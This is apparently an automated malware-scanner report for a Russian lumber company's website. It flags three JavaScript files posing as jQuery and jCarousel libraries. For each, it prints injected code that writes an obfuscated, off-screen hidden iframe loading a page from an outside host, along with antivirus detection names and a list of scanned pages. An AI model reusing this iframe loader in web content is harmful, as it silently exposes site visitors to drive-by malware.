New scan:

Malware Scanner report for massiv-nord.ru

Malicious/Suspicious/Total urls checked
3/0/16
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "massiv-nord.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/3
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=massiv-nord.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://massiv-nord.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://massiv-nord.ru/
200 OK
Content-Length: 24947
Content-Type: text/html
clean
http://massiv-nord.ru/assets/templates/site/scripts/jquery-1.4.1.min.js
200 OK
Content-Length: 2585
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 1676 bytes are skipped ...
>}
if (!browserData()) {
var cookie = getCookie('jungleposter3r38fment17ashfeuajsle');
if (cookie == undefined) {
setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001);
document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://xorenam.firarumahbusana.com/hbcxvsafwegrshhtrsj12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>');
}
}
})();

Antivirus reports:

Microsoft
Trojan:JS/Iframe.DI
ESET-NOD32
JS/Iframe.JT

http://massiv-nord.ru/assets/templates/site/scripts/jquery.jcarousel.pack.js
200 OK
Content-Length: 2585
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 1676 bytes are skipped ...
>}
if (!browserData()) {
var cookie = getCookie('jungleposter3r38fment17ashfeuajsle');
if (cookie == undefined) {
setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001);
document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://xorenam.firarumahbusana.com/hbcxvsafwegrshhtrsj12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>');
}
}
})();

Antivirus reports:

Microsoft
Trojan:JS/Iframe.DI
ESET-NOD32
JS/Iframe.JT

http://massiv-nord.ru/assets/templates/site/scripts/jquery.jcarousel.setup.js
200 OK
Content-Length: 2585
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 1676 bytes are skipped ...
>}
if (!browserData()) {
var cookie = getCookie('jungleposter3r38fment17ashfeuajsle');
if (cookie == undefined) {
setTimer('jungleposter3r38fment17ashfeuajsle', true, 260001);
document.write('<'+'i'+'f'+'r'+'a'+'me'+' s'+'r'+'c="http://xorenam.firarumahbusana.com/hbcxvsafwegrshhtrsj12.html" Name="Position" style="posit'+'ion:ab'+'solute;left'+':'+'-1370px;top'+':'+'-1370px;" height="160" width="160"></i'+'f'+'r'+'am'+'e'+'>');
}
}
})();

Antivirus reports:

Microsoft
Trojan:JS/Iframe.DI
ESET-NOD32
JS/Iframe.JT

http://massiv-nord.ru//mc.yandex.ru/metrika/watch.js/
404 Not Found
Content-Length: 1439
Content-Type: text/html
clean
http://massiv-nord.ru/about.html
200 OK
Content-Length: 24817
Content-Type: text/html
clean
http://counter.rambler.ru/top100.jcn?2665533
200 OK
Content-Length: 6853
Content-Type: application/x-javascript
clean
http://massiv-nord.ru/uslugi.html
200 OK
Content-Length: 26343
Content-Type: text/html
clean
http://massiv-nord.ru/uslugi/prodaja-pilomaterialov.html
200 OK
Content-Length: 40053
Content-Type: text/html
clean
http://massiv-nord.ru/uslugi/
HTTP/1.1 301 Moved Permanently
Cache-Control: private, must-revalidate
Connection: close
Date: Wed, 27 Aug 2014 01:21:30 GMT
Location: /uslugi.html
Server: nginx/1.6.0
Content-Length: 0
Content-Type: text/html; charset=utf-8
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4bbd93e54b432=d7f4601a6cc5941ca958eff4c82e94fb; path=/
Set-Cookie: SN4bbd93e54b432=d7f4601a6cc5941ca958eff4c82e94fb; path=/
X-Powered-By: PHP/5.3.18
clean
http://massiv-nord.ru/test404page.js
404 Not Found
Content-Length: 1439
Content-Type: text/html
clean
http://massiv-nord.ru/kontaktnaya-informacziya.html
200 OK
Content-Length: 18901
Content-Type: text/html
clean
http://massiv-nord.ru/uslugi/suchka-pilomaterialov.html
200 OK
Content-Length: 25631
Content-Type: text/html
clean
http://massiv-nord.ru/uslugi/izgotovlenie-mebelnix-shitov.html
200 OK
Content-Length: 62225
Content-Type: text/html
clean
http://massiv-nord.ru/prajs-na-uslugi.html
200 OK
Content-Length: 78373
Content-Type: text/html
clean
http://massiv-nord.ru/prajs-na-uslugi/prajs-na-pilomaterialyi.html
200 OK
Content-Length: 33861
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: massiv-nord.ru

Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Wed, 27 Aug 2014 01:21:25 GMT
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
Set-Cookie: SN4bbd93e54b432=b6c7a6d302bb50989f6e9035dbf7c7f4; path=/
X-Powered-By: PHP/5.3.18
Second query (visit from search engine):
GET / HTTP/1.1
Host: massiv-nord.ru
Referer: http://www.google.com/search?q=massiv-nord.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.